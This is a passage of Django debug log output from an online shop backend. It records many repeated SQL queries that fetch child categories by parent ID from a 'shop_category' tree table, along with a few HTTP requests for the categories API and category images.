"shop_category"."lft" ASC; args=(25,) DEBUG 2019-12-19 10:42:50,359 utils 4252 140031482124032 (0.000) SELECT "shop_category"."id", "shop_category"."name", "shop_category"."parent_id", "shop_category"."image", "shop_category"."description", "shop_category"."popular", "shop_category"."slug", "shop_category"."lft", "shop_category"."rght", "shop_category"."tree_id", "shop_category"."level" FROM "shop_category" WHERE "shop_category"."parent_id" = 7 ORDER BY "shop_category"."tree_id" ASC, "shop_category"."lft" ASC; args=(7,) DEBUG 2019-12-19 10:42:50,363 utils 4252 140031482124032 (0.000) SELECT "shop_category"."id", "shop_category"."name", "shop_category"."parent_id", "shop_category"."image", "shop_category"."description", "shop_category"."popular", "shop_category"."slug", "shop_category"."lft", "shop_category"."rght", "shop_category"."tree_id", "shop_category"."level" FROM "shop_category" WHERE "shop_category"."parent_id" = 37 ORDER BY "shop_category"."tree_id" ASC, "shop_category"."lft" ASC; args=(37,) DEBUG 2019-12-19 10:42:50,365 utils 4252 140031482124032 (0.000) SELECT "shop_category"."id", "shop_category"."name", "shop_category"."parent_id", "shop_category"."image", "shop_category"."description", "shop_category"."popular", "shop_category"."slug", "shop_category"."lft", "shop_category"."rght", "shop_category"."tree_id", "shop_category"."level" FROM "shop_category" WHERE "shop_category"."parent_id" = 39 ORDER BY "shop_category"."tree_id" ASC, "shop_category"."lft" ASC; args=(39,) DEBUG 2019-12-19 10:42:50,367 utils 4252 140031482124032 (0.000) SELECT "shop_category"."id", "shop_category"."name", "shop_category"."parent_id", "shop_category"."image", "shop_category"."description", "shop_category"."popular", "shop_category"."slug", "shop_category"."lft", "shop_category"."rght", "shop_category"."tree_id", "shop_category"."level" FROM "shop_category" WHERE "shop_category"."parent_id" = 38 ORDER BY "shop_category"."tree_id" ASC, "shop_category"."lft" ASC; args=(38,) DEBUG 2019-12-19 10:42:50,369 utils 4252 140031482124032 (0.000) SELECT "shop_category"."id", "shop_category"."name", "shop_category"."parent_id", "shop_category"."image", "shop_category"."description", "shop_category"."popular", "shop_category"."slug", "shop_category"."lft", "shop_category"."rght", "shop_category"."tree_id", "shop_category"."level" FROM "shop_category" WHERE "shop_category"."parent_id" = 36 ORDER BY "shop_category"."tree_id" ASC, "shop_category"."lft" ASC; args=(36,) DEBUG 2019-12-19 10:42:50,371 utils 4252 140031482124032 (0.000) SELECT "shop_category"."id", "shop_category"."name", "shop_category"."parent_id", "shop_category"."image", "shop_category"."description", "shop_category"."popular", "shop_category"."slug", "shop_category"."lft", "shop_category"."rght", "shop_category"."tree_id", "shop_category"."level" FROM "shop_category" WHERE "shop_category"."parent_id" = 35 ORDER BY "shop_category"."tree_id" ASC, "shop_category"."lft" ASC; args=(35,) DEBUG 2019-12-19 10:42:50,374 utils 4252 140031482124032 (0.000) SELECT "shop_category"."id", "shop_category"."name", "shop_category"."parent_id", "shop_category"."image", "shop_category"."description", "shop_category"."popular", "shop_category"."slug", "shop_category"."lft", "shop_category"."rght", "shop_category"."tree_id", "shop_category"."level" FROM "shop_category" WHERE "shop_category"."parent_id" = 4 ORDER BY "shop_category"."tree_id" ASC, "shop_category"."lft" ASC; args=(4,) DEBUG 2019-12-19 10:42:50,378 utils 4252 140031482124032 (0.000) SELECT "shop_category"."id", "shop_category"."name", "shop_category"."parent_id", "shop_category"."image", "shop_category"."description", "shop_category"."popular", "shop_category"."slug", "shop_category"."lft", "shop_category"."rght", "shop_category"."tree_id", "shop_category"."level" FROM "shop_category" WHERE "shop_category"."parent_id" = 26 ORDER BY "shop_category"."tree_id" ASC, "shop_category"."lft" ASC; args=(26,) DEBUG 2019-12-19 10:42:50,381 utils 4252 140031482124032 (0.000) SELECT "shop_category"."id", "shop_category"."name", "shop_category"."parent_id", "shop_category"."image", "shop_category"."description", "shop_category"."popular", "shop_category"."slug", "shop_category"."lft", "shop_category"."rght", "shop_category"."tree_id", "shop_category"."level" FROM "shop_category" WHERE "shop_category"."parent_id" = 29 ORDER BY "shop_category"."tree_id" ASC, "shop_category"."lft" ASC; args=(29,) DEBUG 2019-12-19 10:42:50,383 utils 4252 140031482124032 (0.000) SELECT "shop_category"."id", "shop_category"."name", "shop_category"."parent_id", "shop_category"."image", "shop_category"."description", "shop_category"."popular", "shop_category"."slug", "shop_category"."lft", "shop_category"."rght", "shop_category"."tree_id", "shop_category"."level" FROM "shop_category" WHERE "shop_category"."parent_id" = 28 ORDER BY "shop_category"."tree_id" ASC, "shop_category"."lft" ASC; args=(28,) DEBUG 2019-12-19 10:42:50,385 utils 4252 140031482124032 (0.000) SELECT "shop_category"."id", "shop_category"."name", "shop_category"."parent_id", "shop_category"."image", "shop_category"."description", "shop_category"."popular", "shop_category"."slug", "shop_category"."lft", "shop_category"."rght", "shop_category"."tree_id", "shop_category"."level" FROM "shop_category" WHERE "shop_category"."parent_id" = 27 ORDER BY "shop_category"."tree_id" ASC, "shop_category"."lft" ASC; args=(27,) DEBUG 2019-12-19 10:42:50,387 utils 4252 140031482124032 (0.000) SELECT "shop_category"."id", "shop_category"."name", "shop_category"."parent_id", "shop_category"."image", "shop_category"."description", "shop_category"."popular", "shop_category"."slug", "shop_category"."lft", "shop_category"."rght", "shop_category"."tree_id", "shop_category"."level" FROM "shop_category" WHERE "shop_category"."parent_id" = 8 ORDER BY "shop_category"."tree_id" ASC, "shop_category"."lft" ASC; args=(8,) DEBUG 2019-12-19 10:42:50,391 utils 4252 140031482124032 (0.000) SELECT "shop_category"."id", "shop_category"."name", "shop_category"."parent_id", "shop_category"."image", "shop_category"."description", "shop_category"."popular", "shop_category"."slug", "shop_category"."lft", "shop_category"."rght", "shop_category"."tree_id", "shop_category"."level" FROM "shop_category" WHERE "shop_category"."parent_id" = 43 ORDER BY "shop_category"."tree_id" ASC, "shop_category"."lft" ASC; args=(43,) DEBUG 2019-12-19 10:42:50,393 utils 4252 140031482124032 (0.000) SELECT "shop_category"."id", "shop_category"."name", "shop_category"."parent_id", "shop_category"."image", "shop_category"."description", "shop_category"."popular", "shop_category"."slug", "shop_category"."lft", "shop_category"."rght", "shop_category"."tree_id", "shop_category"."level" FROM "shop_category" WHERE "shop_category"."parent_id" = 42 ORDER BY "shop_category"."tree_id" ASC, "shop_category"."lft" ASC; args=(42,) DEBUG 2019-12-19 10:42:50,395 utils 4252 140031482124032 (0.000) SELECT "shop_category"."id", "shop_category"."name", "shop_category"."parent_id", "shop_category"."image", "shop_category"."description", "shop_category"."popular", "shop_category"."slug", "shop_category"."lft", "shop_category"."rght", "shop_category"."tree_id", "shop_category"."level" FROM "shop_category" WHERE "shop_category"."parent_id" = 41 ORDER BY "shop_category"."tree_id" ASC, "shop_category"."lft" ASC; args=(41,) DEBUG 2019-12-19 10:42:50,398 utils 4252 140031482124032 (0.000) SELECT "shop_category"."id", "shop_category"."name", "shop_category"."parent_id", "shop_category"."image", "shop_category"."description", "shop_category"."popular", "shop_category"."slug", "shop_category"."lft", "shop_category"."rght", "shop_category"."tree_id", "shop_category"."level" FROM "shop_category" WHERE "shop_category"."parent_id" = 40 ORDER BY "shop_category"."tree_id" ASC, "shop_category"."lft" ASC; args=(40,) DEBUG 2019-12-19 10:42:50,400 utils 4252 140031482124032 (0.000) SELECT "shop_category"."id", "shop_category"."name", "shop_category"."parent_id", "shop_category"."image", "shop_category"."description", "shop_category"."popular", "shop_category"."slug", "shop_category"."lft", "shop_category"."rght", "shop_category"."tree_id", "shop_category"."level" FROM "shop_category" WHERE "shop_category"."parent_id" = 5 ORDER BY "shop_category"."tree_id" ASC, "shop_category"."lft" ASC; args=(5,) DEBUG 2019-12-19 10:42:50,404 utils 4252 140031482124032 (0.000) SELECT "shop_category"."id", "shop_category"."name", "shop_category"."parent_id", "shop_category"."image", "shop_category"."description", "shop_category"."popular", "shop_category"."slug", "shop_category"."lft", "shop_category"."rght", "shop_category"."tree_id", "shop_category"."level" FROM "shop_category" WHERE "shop_category"."parent_id" = 34 ORDER BY "shop_category"."tree_id" ASC, "shop_category"."lft" ASC; args=(34,) DEBUG 2019-12-19 10:42:50,406 utils 4252 140031482124032 (0.000) SELECT "shop_category"."id", "shop_category"."name", "shop_category"."parent_id", "shop_category"."image", "shop_category"."description", "shop_category"."popular", "shop_category"."slug", "shop_category"."lft", "shop_category"."rght", "shop_category"."tree_id", "shop_category"."level" FROM "shop_category" WHERE "shop_category"."parent_id" = 33 ORDER BY "shop_category"."tree_id" ASC, "shop_category"."lft" ASC; args=(33,) DEBUG 2019-12-19 10:42:50,408 utils 4252 140031482124032 (0.000) SELECT "shop_category"."id", "shop_category"."name", "shop_category"."parent_id", "shop_category"."image", "shop_category"."description", "shop_category"."popular", "shop_category"."slug", "shop_category"."lft", "shop_category"."rght", "shop_category"."tree_id", "shop_category"."level" FROM "shop_category" WHERE "shop_category"."parent_id" = 32 ORDER BY "shop_category"."tree_id" ASC, "shop_category"."lft" ASC; args=(32,) DEBUG 2019-12-19 10:42:50,410 utils 4252 140031482124032 (0.000) SELECT "shop_category"."id", "shop_category"."name", "shop_category"."parent_id", "shop_category"."image", "shop_category"."description", "shop_category"."popular", "shop_category"."slug", "shop_category"."lft", "shop_category"."rght", "shop_category"."tree_id", "shop_category"."level" FROM "shop_category" WHERE "shop_category"."parent_id" = 31 ORDER BY "shop_category"."tree_id" ASC, "shop_category"."lft" ASC; args=(31,) DEBUG 2019-12-19 10:42:50,412 utils 4252 140031482124032 (0.000) SELECT "shop_category"."id", "shop_category"."name", "shop_category"."parent_id", "shop_category"."image", "shop_category"."description", "shop_category"."popular", "shop_category"."slug", "shop_category"."lft", "shop_category"."rght", "shop_category"."tree_id", "shop_category"."level" FROM "shop_category" WHERE "shop_category"."parent_id" = 30 ORDER BY "shop_category"."tree_id" ASC, "shop_category"."lft" ASC; args=(30,) DEBUG 2019-12-19 10:42:50,415 utils 4252 140031482124032 (0.000) SELECT "shop_category"."id", "shop_category"."name", "shop_category"."parent_id", "shop_category"."image", "shop_category"."description", "shop_category"."popular", "shop_category"."slug", "shop_category"."lft", "shop_category"."rght", "shop_category"."tree_id", "shop_category"."level" FROM "shop_category" WHERE "shop_category"."parent_id" = 11 ORDER BY "shop_category"."tree_id" ASC, "shop_category"."lft" ASC; args=(11,) DEBUG 2019-12-19 10:42:50,417 utils 4252 140031482124032 (0.000) SELECT "shop_category"."id", "shop_category"."name", "shop_category"."parent_id", "shop_category"."image", "shop_category"."description", "shop_category"."popular", "shop_category"."slug", "shop_category"."lft", "shop_category"."rght", "shop_category"."tree_id", "shop_category"."level" FROM "shop_category" WHERE "shop_category"."parent_id" = 17 ORDER BY "shop_category"."tree_id" ASC, "shop_category"."lft" ASC; args=(17,) DEBUG 2019-12-19 10:42:50,420 utils 4252 140031482124032 (0.000) SELECT "shop_category"."id", "shop_category"."name", "shop_category"."parent_id", "shop_category"."image", "shop_category"."description", "shop_category"."popular", "shop_category"."slug", "shop_category"."lft", "shop_category"."rght", "shop_category"."tree_id", "shop_category"."level" FROM "shop_category" WHERE "shop_category"."parent_id" = 16 ORDER BY "shop_category"."tree_id" ASC, "shop_category"."lft" ASC; args=(16,) DEBUG 2019-12-19 10:42:50,422 utils 4252 140031482124032 (0.000) SELECT "shop_category"."id", "shop_category"."name", "shop_category"."parent_id", "shop_category"."image", "shop_category"."description", "shop_category"."popular", "shop_category"."slug", "shop_category"."lft", "shop_category"."rght", "shop_category"."tree_id", "shop_category"."level" FROM "shop_category" WHERE "shop_category"."parent_id" = 9 ORDER BY "shop_category"."tree_id" ASC, "shop_category"."lft" ASC; args=(9,) DEBUG 2019-12-19 10:42:50,424 utils 4252 140031482124032 (0.000) SELECT "shop_category"."id", "shop_category"."name", "shop_category"."parent_id", "shop_category"."image", "shop_category"."description", "shop_category"."popular", "shop_category"."slug", "shop_category"."lft", "shop_category"."rght", "shop_category"."tree_id", "shop_category"."level" FROM "shop_category" WHERE "shop_category"."parent_id" = 44 ORDER BY "shop_category"."tree_id" ASC, "shop_category"."lft" ASC; args=(44,) DEBUG 2019-12-19 10:42:50,427 utils 4252 140031482124032 (0.000) SELECT "shop_category"."id", "shop_category"."name", "shop_category"."parent_id", "shop_category"."image", "shop_category"."description", "shop_category"."popular", "shop_category"."slug", "shop_category"."lft", "shop_category"."rght", "shop_category"."tree_id", "shop_category"."level" FROM "shop_category" WHERE "shop_category"."parent_id" = 45 ORDER BY "shop_category"."tree_id" ASC, "shop_category"."lft" ASC; args=(45,) [19/Dec/2019 10:42:50] "GET /api/v1/categories/ HTTP/1.0" 200 15396 [19/Dec/2019 10:42:51] "GET /media/categories/2019/12/07/collection10.png HTTP/1.0" 200 387799 [19/Dec/2019 10:42:51] "GET /media/categories/2019/12/07/collection6.png HTTP/1.0" 200 600645 DEBUG 2019-12-19 10:43:25,372 utils 4252 140031721535232 (0.004) SELECT "shop_category"."id", "shop_category"."name", "shop_category"."parent_id", "shop_category"."image", "shop_category"."description", "shop_category"."popular", "shop_category"."slug", "shop_category"."lft", "shop_category"."rght", "shop_category"."tree_id", "shop_category"."level" FROM "shop_category" ORDER BY "shop_category"."tree_id" ASC, "shop_category"."lft" ASC; args=() DEBUG 2019-12-19 10:43:25,383 utils 4252 140031721535232 (0.001) SELECT "shop_category"."id", "shop_category"."name", "shop_category"."parent_id", "shop_category"."image", "shop_category"."description", "shop_category"."popular", "shop_category"."slug", "shop_category"."lft", "shop_category"."rght", "shop_category"."tree_id", "shop_category"."level" FROM "shop_category" WHERE "shop_category"."parent_id" = 10 ORDER BY "shop_category"."tree_id" ASC, "shop_category"."lft" ASC; args=(10,) DEBUG 2019-12-19 10:43:25,389 utils 4252 140031721535232 (0.001) SELECT "shop_category"."id", "shop_category"."name", "shop_category"."parent_id", "shop_category"."image", "shop_category"."description", "shop_category"."popular", "shop_category"."slug", "shop_category"."lft", "shop_category"."rght", "shop_category"."tree_id", "shop_category"."level" FROM "shop_category" WHERE "shop_category"."parent_id" = 46 ORDER BY "shop_category"."tree_id" ASC, "shop_category"."lft" ASC; args=(46,) DEBUG 2019-12-19 10:43:25,391 utils 4252 140031721535232 (0.001) SELECT "shop_category"."id", "shop_category"."name", "shop_category"."parent_id", "shop_category"."image", "shop_category"."description", "shop_category"."popular", "shop_category"."slug", "shop_category"."lft", "shop_category"."rght", "shop_category"."tree_id", "shop_category"."level" FROM "shop_category" WHERE "shop_category"."parent_id" = 6 ORDER BY "shop_category"."tree_id" ASC, "shop_category"."lft" ASC; args=(6,) DEBUG 2019-12-19 10:43:25,395 utils 4252 140031721535232 (0.001) SELECT "shop_category"."id", "shop_category"."name", "shop_category"."parent_id", "shop_category"."image", "shop_category"."description", "shop_category"."popular", "shop_category"."slug", "shop_category"."lft", "shop_category"."rght", "shop_category"."tree_id", "shop_category"."level" FROM "shop_category" WHERE "shop_category"."parent_id" = 14 ORDER BY "shop_category"."tree_id" ASC, "shop_category"."lft" ASC; args=(14,) DEBUG 2019-12-19 10:43:25,398 utils 4252 140031721535232 (0.001) SELECT "shop_category"."id", "shop_category"."name", "shop_category"."parent_id", "shop_category"."image", "shop_category"."description", "shop_category"."popular", "shop_category"."slug", "shop_category"."lft", "shop_category"."rght", "shop_category"."tree_id", "shop_category"."level" FROM "shop_category" WHERE "shop_category"."parent_id" = 13 ORDER BY "shop_category"."tree_id" ASC, "shop_category"."lft" ASC; args=(13,) DEBUG 2019-12-19 10:43:25,400 utils 4252 140031721535232 (0.001) SELECT "shop_category"."id", "shop_category"."name", "shop_category"."parent_id", "shop_category"."image", "shop_category"."description", "shop_category"."popular", "shop_category"."slug", "shop_category"."lft", "shop_category"."rght", "shop_category"."tree_id", "shop_category"."level" FROM "shop_category" WHERE "shop_category"."parent_id" = 12 ORDER BY "shop_category"."tree_id" ASC, "shop_category"."lft" ASC; args=(12,) DEBUG 2019-12-19 10:43:25,404 utils 4252 140031721535232 (0.001) SELECT "shop_category"."id", "shop_category"."name", "shop_category"."parent_id", "shop_category"."image", "shop_category"."description", "shop_category"."popular", "shop_category"."slug", "shop_category"."lft", "shop_category"."rght", "shop_category"."tree_id", "shop_category"."level" FROM "shop_category" WHERE "shop_category"."parent_id" = 15 ORDER BY "shop_category"."tree_id" ASC, "shop_category"."lft" ASC; args=(15,) DEBUG 2019-12-19 10:43:25,407 utils 4252 140031721535232 (0.001) SELECT "shop_category"."id", "shop_category"."name", "shop_category"."parent_id", "shop_category"."image", "shop_category"."description", "shop_category"."popular", "shop_category"."slug", "shop_category"."lft", "shop_category"."rght", "shop_category"."tree_id", "shop_category"."level" FROM "shop_category" WHERE "shop_category"."parent_id" = 1 ORDER BY "shop_category"."tree_id" ASC, "shop_category"."lft" ASC; args=(1,) DEBUG 2019-12-19 10:43:25,411 utils 4252 140031721535232 (0.001) SELECT "shop_category"."id", "shop_category"."name", "shop_category"."parent_id", "shop_category"."image", "shop_category"."description", "shop_category"."popular", "shop_category"."slug", "shop_category"."lft", "shop_category"."rght", "shop_category"."tree_id", "shop_category"."level" FROM "shop_category" WHERE "shop_category"."parent_id" = 20 ORDER BY "shop_category"."tree_id" ASC, "shop_category"."lft" ASC; args=(20,) DEBUG 2019-12-19 10:43:25,413 utils 4252 140031721535232 (0.000) SELECT "shop_category"."id", "shop_category"."name", "shop_category"."parent_id", "shop_category"."image", "shop_category"."description", "shop_category"."popular", "shop_category"."slug", "shop_category"."lft", "shop_category"."rght", "shop_category"."tree_id", "shop_category"."level" FROM "shop_category" WHERE "shop_category"."parent_id" = 18 ORDER BY "shop_category"."tree_id" ASC, "shop_category"."lft" ASC; args=(18,) DEBUG 2019-12-19 10:43:25,416 utils 4252 140031721535232 (0.001) SELECT "shop_category"."id", "shop_category"."name", "shop_category"."parent_id", "shop_category"."image", "shop_category"."description", "shop_category"."popular", "shop_category"."slug", "shop_category"."lft", "shop_category"."rght", "shop_category"."tree_id", "shop_category"."level" FROM "shop_category" WHERE "shop_category"."parent_id" = 21 ORDER BY "shop_category"."tree_id" ASC, "shop_category"."lft" ASC; args=(21,) DEBUG 2019-12-19 10:43:25,418 utils 4252 140031721535232 (0.001) SELECT "shop_category"."id", "shop_category"."name", "shop_category"."parent_id", "shop_category"."image", "shop_category"."description", "shop_category"."popular", "shop_category"."slug", "shop_category"."lft", "shop_category"."rght", "shop_category"."tree_id", "shop_category"."level" FROM "shop_category" WHERE "shop_category"."parent_id" = 19 ORDER BY "shop_category"."tree_id" ASC, "shop_category"."lft" ASC; args=(19,) DEBUG 2019-12-19 10:43:25,420 utils 4252 140031721535232 (0.001) SELECT "shop_category"."id", "shop_category"."name", "shop_category"."parent_id", "shop_category"."image", "shop_category"."description", "shop_category"."popular", "shop_category"."slug", "shop_category"."lft", "shop_category"."rght", "shop_category"."tree_id", "shop_category"."level" FROM "shop_category" WHERE "shop_category"."parent_id" = 3 ORDER BY "shop_category"."tree_id" ASC, "shop_category"."lft" ASC; args=(3,) DEBUG 2019-12-19 10:43:25,424 utils 4252 140031721535232 (0.000) SELECT "shop_category"."id", "shop_category"."name", "shop_category"."parent_id", "shop_category"."image", "shop_category"."description", "shop_category"."popular", "shop_category"."slug", "shop_category"."lft", "shop_category"."rght", "shop_category"."tree_id", "shop_category"."level" FROM "shop_category" WHERE "shop_category"."parent_id" = 22 ORDER BY "shop_category"."tree_id" ASC, "shop_category"."lft" ASC; args=(22,) DEBUG 2019-12-19 10:43:25,426 utils 4252 140031721535232 (0.000) SELECT "shop_category"."id", "shop_category"."name", "shop_category"."parent_id", "shop_category"."image", "shop_category"."description", "shop_category"."popular", "shop_category"."slug", "shop_category"."lft", "shop_category"."rght", "shop_category"."tree_id", "shop_category"."level" FROM "shop_category" WHERE "shop_category"."parent_id" = 23 ORDER BY "shop_category"."tree_id" ASC, "shop_category"."lft" ASC; args=(23,) DEBUG 2019-12-19 10:43:25,429 utils 4252 140031721535232 (0.000) SELECT "shop_category"."id", "shop_category"."name", "shop_category"."parent_id", "shop_category"."image", "shop_category"."description", "shop_category"."popular", "shop_category"."slug", "shop_category"."lft", "shop_category"."rght", "shop_category"."tree_id", "shop_category"."level" FROM "shop_category" WHERE "shop_category"."parent_id" = 24 ORDER BY "shop_category"."tree_id" ASC, "shop_category"."lft" ASC; args=(24,) DEBUG 2019-12-19 10:43:25,431 utils 4252 140031721535232 (0.000) SELECT "shop_category"."id", "shop_category"."name", "shop_category"."parent_id", "shop_category"."image", "shop_category"."description", "shop_category"."popular", "shop_category"."slug", "shop_category"."lft", "shop_category"."rght", "shop_category"."tree_id", "shop_category"."level" FROM "shop_category" WHERE "shop_category"."parent_id" = 25 ORDER BY "shop_category"."tree_id" ASC, "shop_category"."lft" ASC; args=(25,) DEBUG 2019-12-19 10:43:25,434 utils 4252 140031721535232 (0.001) SELECT "shop_category"."id", "shop_category"."name", "shop_category"."parent_id", "shop_category"."image", "shop_category"."description", "shop_category"."popular", "shop_category"."slug", "shop_category"."lft", "shop_category"."rght", "shop_category"."tree_id", "shop_category"."level" FROM "shop_category" WHERE "shop_category"."parent_id" = 7 ORDER BY "shop_category"."tree_id" ASC, "shop_category"."lft" ASC; args=(7,) DEBUG 2019-12-19 10:43:25,438 utils 4252 140031721535232 (0.001) SELECT "shop_category"."id", "shop_category"."name", "shop_category"."parent_id", "shop_category"."image", "shop_category"."description", "shop_category"."popular", "shop_category"."slug", "shop_category"."lft", "shop_category"."rght", "shop_category"."tree_id", "shop_category"."level" FROM "shop_category" WHERE "shop_category"."parent_id" = 37 ORDER BY "shop_category"."tree_id" ASC, "shop_category"."lft" ASC; args=(37,) DEBUG 2019-12-19 10:43:25,441 utils 4252 140031721535232 (0.000) SELECT "shop_category"."id", "shop_category"."name", "shop_category"."parent_id", "shop_category"."image", "shop_category"."description", "shop_category"."popular", "shop_category"."slug", "shop_category"."lft", "shop_category"."rght", "shop_category"."tree_id", "shop_category"."level" FROM "shop_category" WHERE "shop_category"."parent_id" = 39 ORDER BY "shop_category"."tree_id" ASC, "shop_category"."lft" ASC; args=(39,) DEBUG 2019-12-19 10:43:25,443 utils 4252 140031721535232 (0.000) SELECT "shop_category"."id", "shop_category"."name", "shop_category"."parent_id", "shop_category"."image", "shop_category"."description", "shop_category"."popular", "shop_category"."slug", "shop_category"."lft", "shop_category"."rght", "shop_category"."tree_id", "shop_category"."level" FROM "shop_category" WHERE "shop_category"."parent_id" = 38 ORDER BY "shop_category"."tree_id" ASC, "shop_category"."lft" ASC; args=(38,) DEBUG 2019-12-19 10:43:25,446 utils 4252 140031721535232 (0.001) SELECT "shop_category"."id", "shop_category"."name", "shop_category"."parent_id", "shop_category"."image", "shop_category"."description", "shop_category"."popular", "shop_category"."slug", "shop_category"."lft", "shop_category"."rght", "shop_category"."tree_id", "shop_category"."level" FROM "shop_category" WHERE "shop_category"."parent_id" = 36 ORDER BY "shop_category"."tree_id" ASC, "shop_category"."lft" ASC; args=(36,) DEBUG 2019-12-19 10:43:25,448 utils 4252 140031721535232 (0.000) SELECT "shop_category"."id", "shop_category"."name", "shop_category"."parent_id", "shop_category"."image", "shop_category"."description", "shop_category"."popular", "shop_category"."slug", "shop_category"."lft", "shop_category"."rght", "shop_category"."tree_id", "shop_category"."level" FROM "shop_category" WHERE "shop_category"."parent_id" = 35 ORDER BY "shop_category"."tree_id" ASC, "shop_category"."lft" ASC; args=(35,) DEBUG 2019-12-19 10:43:25,451 utils 4252 140031721535232 (0.001) SELECT "shop_category"."id", "shop_category"."name", "shop_category"."parent_id", "shop_category"."image", "shop_category"."description", "shop_category"."popular", "shop_category"."slug", "shop_category"."lft", "shop_category"."rght", "shop_category"."tree_id", "shop_category"."level" FROM "shop_category" WHERE "shop_category"."parent_id" = 4 ORDER BY "shop_category"."tree_id" ASC, "shop_category"."lft" ASC; args=(4,) DEBUG 2019-12-19 10:43:25,454 utils 4252 140031721535232 (0.000) SELECT "shop_category"."id", "shop_category"."name", "shop_category"."parent_id", "shop_category"."image", "shop_category"."description", "shop_category"."popular", "shop_category"."slug", "shop_category"."lft", "shop_category"."rght", "shop_category"."tree_id", "shop_category"."level" FROM "shop_category" WHERE "shop_category"."parent_id" = 26 ORDER BY "shop_category"."tree_id" ASC, "shop_category"."lft" ASC; args=(26,) DEBUG 2019-12-19 10:43:25,457 utils 4252 140031721535232 (0.000) SELECT "shop_category"."id", "shop_category"."name", "shop_category"."parent_id", "shop_category"."image", "shop_category"."description", "shop_category"."popular", "shop_category"."slug", "shop_category"."lft", "shop_category"."rght", "shop_category"."tree_id", "shop_category"."level" FROM "shop_category" WHERE "shop_category"."parent_id" = 29 ORDER BY "shop_category"."tree_id" ASC, "shop_category"."lft" ASC; args=(29,) DEBUG 2019-12-19 10:43:25,459 utils 4252 140031721535232 (0.000) SELECT "shop_category"."id", "shop_category"."name", "shop_category"."parent_id", "shop_category"."image", "shop_category"."description", "shop_category"."popular", "shop_category"."slug", "shop_category"."lft", "shop_category"."rght", "shop_category"."tree_id", "shop_category"."level" FROM "shop_category" WHERE "shop_category"."parent_id" = 28 ORDER BY "shop_category"."tree_id" ASC, "shop_category"."lft" ASC; args=(28,) DEBUG 2019-12-19 10:43:25,462 utils 4252 140031721535232 (0.001) SELECT "shop_category"."id", "shop_category"."name", "shop_category"."parent_id", "shop_category"."image", "shop_category"."description", "shop_category"."popular", "shop_category"."slug", "shop_category"."lft", "shop_category"."rght", "shop_category"."tree_id", "shop_category"."level" FROM "shop_category" WHERE "shop_category"."parent_id" = 27 ORDER BY "shop_category"."tree_id" ASC, "shop_category"."lft" ASC; args=(27,) DEBUG 2019-12-19 10:43:25,464 utils 4252 140031721535232 (0.000) SELECT "shop_category"."id", "shop_category"."name", "shop_category"."parent_id", "shop_category"."image", "shop_category"."description", "shop_category"."popular", "shop_category"."slug", "shop_category"."lft", "shop_category"."rght", "shop_category"."tree_id", "shop_category"."level" FROM "shop_category" WHERE "shop_category"."parent_id" = 8 ORDER BY "shop_category"."tree_id" ASC, "shop_category"."lft" ASC; args=(8,) DEBUG 2019-12-19 10:43:25,468 utils 4252 140031721535232 (0.000) SELECT "shop_category"."id", "shop_category"."name", "shop_category"."parent_id", "shop_category"."image", "shop_category"."description", "shop_category"."popular", "shop_category"."slug", "shop_category"."lft", "shop_category"."rght", "shop_category"."tree_id", "shop_category"."level" FROM "shop_category" WHERE "shop_category"."parent_id" = 43 ORDER BY "shop_category"."tree_id" ASC, "shop_category"."lft" ASC; args=(43,) DEBUG 2019-12-19 10:43:25,471 utils 4252 140031721535232 (0.000) SELECT "shop_category"."id", "shop_category"."name", "shop_category"."parent_id", "shop_category"."image", "shop_category"."description", "shop_category"."popular", "shop_category"."slug", "shop_category"."lft", "shop_category"."rght", "shop_category"."tree_id", "shop_category"."level" FROM "shop_category" WHERE "shop_category"."parent_id" = 42 ORDER BY "shop_category"."tree_id" ASC, "shop_category"."lft" ASC; args=(42,) DEBUG 2019-12-19 10:43:25,474 utils 4252 140031721535232 (0.000) SELECT "shop_category"."id", "shop_category"."name", "shop_category"."parent_id", "shop_category"."image", "shop_category"."description", "shop_category"."popular", "shop_category"."slug", "shop_category"."lft", "shop_category"."rght", "shop_category"."tree_id", "shop_category"."level" FROM "shop_category" WHERE "shop_category"."parent_id" = 41 ORDER BY "shop_category"."tree_id" ASC, "shop_category"."lft" ASC; args=(41,) DEBUG 2019-12-19 10:43:25,476 utils 4252 140031721535232 (0.000) SELECT "shop_category"."id", "shop_category"."name", "shop_category"."parent_id", "shop_category"."image", "shop_category"."description", "shop_category"."popular", "shop_category"."slug", "shop_category"."lft", "shop_category"."rght", "shop_category"."tree_id", "shop_category"."level" FROM "shop_category" WHERE "shop_category"."parent_id" = 40 ORDER BY "shop_category"."tree_id" ASC, "shop_category"."lft" ASC; args=(40,) DEBUG 2019-12-19 10:43:25,478 utils 4252 140031721535232 (0.000) SELECT "shop_category"."id", "shop_category"."name", "shop_category"."parent_id", "shop_category"."image", "shop_category"."description", "shop_category"."popular", "shop_category"."slug", "shop_category"."lft", "shop_category"."rght", "shop_category"."tree_id", "shop_category"."level" FROM "shop_category" WHERE "shop_category"."parent_id" = 5 ORDER BY "shop_category"."tree_id" ASC, "shop_category"."lft" ASC; args=(5,) DEBUG 2019-12-19 10:43:25,484 utils 4252 140031721535232 (0.002) SELECT "shop_category"."id", "shop_category"."name", "shop_category"."parent_id", "shop_category"."image", "shop_category"."description", "shop_category"."popular", "shop_category"."slug", "shop_category"."lft", "shop_category"."rght", "shop_category"."tree_id", "shop_category"."level" FROM "shop_category" WHERE "shop_category"."parent_id" = 34 ORDER BY "shop_category"."tree_id" ASC, "shop_category"."lft" ASC; args=(34,) DEBUG 2019-12-19 10:43:25,487 utils 4252 140031721535232 (0.001) SELECT "shop_category"."id", "shop_category"."name", "shop_category"."parent_id", "shop_category"."image", "shop_category"."description", "shop_category"."popular", "shop_category"."slug", "shop_category"."lft", "shop_category"."rght", "shop_category"."tree_id", "shop_category"."level" FROM "shop_category" WHERE "shop_category"."parent_id" = 33 ORDER BY "shop_category"."tree_id" ASC, "shop_category"."lft" ASC; args=(33,) DEBUG 2019-12-19 10:43:25,490 utils 4252 140031721535232 (0.001) SELECT "shop_category"."id", "shop_category"."name", "shop_category"."parent_id", "shop_category"."image", "shop_category"."description", "shop_category"."popular", "shop_category"."slug", "shop_category"."lft", "shop_category"."rght", "shop_category"."tree_id", "shop_category"."level" FROM "shop_category" WHERE "shop_category"."parent_id" = 32 ORDER BY "shop_category"."tree_id" ASC, "shop_category"."lft" ASC; args=(32,) DEBUG 2019-12-19 10:43:25,492 utils 4252 140031721535232 (0.000) SELECT "shop_category"."id", "shop_category"."name", "shop_category"."parent_id", "shop_category"."image", "shop_category"."description", "shop_category"."popular", "shop_category"."slug", "shop_category"."lft", "shop_category"."rght", "shop_category"."tree_id", "shop_category"."level" FROM "shop_category" WHERE "shop_category"."parent_id" = 31 ORDER BY "shop_category"."tree_id" ASC, 